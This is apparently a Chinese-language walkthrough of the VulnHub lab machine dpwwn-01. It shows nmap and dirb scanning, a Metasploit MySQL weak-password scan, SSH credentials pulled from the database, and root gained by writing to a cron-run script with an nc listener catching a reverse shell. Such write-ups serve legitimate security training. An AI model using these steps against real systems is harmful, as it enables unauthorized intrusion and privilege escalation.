vulnhub靶机dpwwn-01

Vulnhub靶机dpwwn-01
靶机下载地址：dpwwn: 1 ~ VulnHub
https://www.vulnhub.com/entry/dpwwn-1,342/
Kali ip：192.168.70.129
靶机ip：192.168.70.137

一、信息搜集

靶机ip发现

 sudo arp-scan -l

nmap -sS 192.168.70.0/24

确定靶机ip为192.168.70.137
开放的端口分别为ssh 22端口，80 http端口，3306 mysql端口
目录扫描
命令：

dirb 192.168.70.137

进行访问除了info.php，没有什么其他的信息

二、mysql和ssh连接

尝试对mysql和ssh进行连接
使用msf对靶机的3306端口进行弱口令扫描，发现登录成功
命令：

use auxiliary/scanner/mysql/mysql_login
set rhost 192.168.70.137
Run

账号是root 密码是空
建立mysql连接
命令：

mysql -h 192.168.70.137 -u root

查询数据库

查询ssh中的数据

发现存在ssh的账号和密码
使用ssh进行连接

连接成功

三、提权

查看文件内容发现是shell脚本，再查看权限，可写入，再查看进程发现存在crontab定时任务。

查找带有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

可以看到也有crontab
使用

cat /etc/os-release

查看系统版本

推荐一篇centos 7 的提权的文章
CentOS 7系统利用suid提权获取Root Shell - FreeBuf网络安全行业门户
https://www.freebuf.com/articles/system/244627.html
开始利用crontab定时任务提权

在logrot.sh中写入命令
在其确认定时任务是否添加成功

Nc开始监听端口即可

nc -nvlp 9999

反弹shell成功，查看权限是root权限